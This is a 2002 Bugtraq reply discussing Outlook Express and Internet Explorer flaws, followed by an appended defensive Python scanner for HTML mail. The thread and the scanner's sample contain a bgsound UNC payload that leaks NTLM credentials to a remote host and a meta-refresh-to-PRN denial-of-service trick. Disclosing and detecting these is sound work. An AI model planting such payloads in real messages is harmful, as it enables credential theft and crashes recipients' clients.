[25489] in bugtraq


Re[2]: dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express

daemon@ATHENA.MIT.EDU (3APA3A)
Fri May 17 17:16:47 2002

Date: Fri, 17 May 2002 21:23:42 +0400
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Message-ID: <9088739901.20020517212342@SECURITY.NNOV.RU>
To: Chad Loder <cloder@acm.org>
Cc: "ERRor" <error@pochtamt.ru>, bugtraq@securityfocus.com
In-Reply-To: <5.1.0.14.2.20020517022537.02df95e8@pop-server.socal.rr.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Chad Loder,

You're right! <bgsound src="\\111.111.111.111\new\file.wav"> causes IE to connect to 111.111.111.111 via NetBT. Depending on LMCompatibilityLevel it may cause the user's cleartext password or NTLMv1 challenge to leak. It's a very serious bug.


--Friday, May 17, 2002, 1:38:16 PM, you wrote to error@pochtamt.ru:

CL> At Wednesday 5/15/2002 03:11 PM +0400, you wrote:

>> Title: Special device access and DoS in Microsoft Internet
>>        Explorer/Outlook Express/Outlook
>>
>> All versions of Windows have reserved filenames referring to special
>> devices such as prn, aux, nul, etc., also called DOS devices.

CL> This might be related to a vulnerability that was reported to Microsoft
CL> on Mar 7 2001. See the BugTraq post:

CL>    http://online.securityfocus.com/archive/1/197926

CL> The META HTTP-EQUIV=REFRESH tag used to do the trick
CL> from Outlook and other email clients using the MS
CL> HTML viewer (e.g. Eudora). Redirecting to file://C:\PRN
CL> was sufficient to hang the browser or email client.

CL> Microsoft assigned the following internal tracking
CL> number to the issue: "MSRC 673au", and fixed it in
CL> MS00-17. Obviously they didn't do a good enough
CL> job, since you guys found a way to print files, etc. :)

CL> Another scary thing is that you can cause the computer to connect
CL> to arbitrary UNC paths, which, as you know, involves sending
CL> NetBIOS credentials over the wire (a good reason to use egress
CL> filtering).

CL> +--------------------------------
CL> Chad Loder <chad@rapid7.com>
CL> Rapid 7, Inc.
CL> <http://www.rapid7.com>
CL> +--------------------------------



-- 
~/ZARAZA
Only I myself exist, flying nowhere. (Lem)
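A defender-side check for the two vectors discussed in this thread, added here as an example and not part of the original post or of any vendor code: it parses an HTML mail body and flags resource references that point at a UNC host (which makes the viewer open a NetBT session and expose credentials) or at a reserved DOS device name (the hang from the quoted meta-refresh report). The sample body, the 111.111.111.111 host and the fileserver name are constructed; the optional quoted-printable step undoes the =3D seen in the quoted bgsound tag.

```python
import re
import quopri
from html.parser import HTMLParser

# Reserved DOS device names (prn, aux, nul, ... as named in the thread)
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL"} | {f"{p}{i}" for p in ("COM", "LPT") for i in range(1, 10)}
URL_ATTRS = {"src", "href", "background", "content"}  # attributes that make the viewer fetch something
# \\host\share, //host/share, file://host/... (a drive letter such as C: is not a host)
UNC_RE = re.compile(r"^(?:file:)?[\\/]{2,}(?![a-z]:)([^\\/]+)", re.I)
# last path component is a device name, with or without an extension (C:\PRN, \prn.txt)
DEVICE_RE = re.compile(r"(?:^|[\\/:])(" + "|".join(DOS_DEVICES) + r")(?:\.[^\\/]*)?$", re.I)
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]+):", re.I)

# Constructed sample: the bgsound from the thread, the meta-refresh-to-PRN trick, a harmless image
SAMPLE = r"""<html><body>
<bgsound src="\\111.111.111.111\new\file.wav">
<meta http-equiv="refresh" content="0;url=file://C:\PRN">
<img src="http://example.invalid/logo.gif">
<a href="file:////fileserver/share/readme.txt">doc</a>
</body></html>"""

class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, kind, detail)
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            name = name.lower()
            if name not in URL_ATTRS or not value:
                continue
            target = value.strip().strip("\"'")
            if name == "content":  # <meta http-equiv=refresh content="0;url=...">
                m = re.search(r"url\s*=\s*(.+)", target, re.I)
                target = m.group(1).strip() if m else ""
            m = UNC_RE.match(target)
            if m:  # the viewer would open a NetBT/SMB session to this host
                self.findings.append((tag, name, "unc-host", m.group(1)))
            scheme = SCHEME_RE.match(target)
            if scheme and scheme.group(1).lower() != "file":
                continue  # http:, mailto: etc. never reach the local file namespace
            m = DEVICE_RE.search(re.sub(r"^file:/*", "", target, flags=re.I))
            if m:
                self.findings.append((tag, name, "dos-device", m.group(1).upper()))

def scan_html_mail(body, quoted_printable=False):
    if quoted_printable:  # undo =3D etc. before parsing
        body = quopri.decodestring(body.encode("latin-1")).decode("latin-1")
    p = _Collector()
    p.feed(body)
    return p.findings
```

Run it over SAMPLE and the bgsound, the meta refresh and the file: UNC link are reported while the http image is not.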

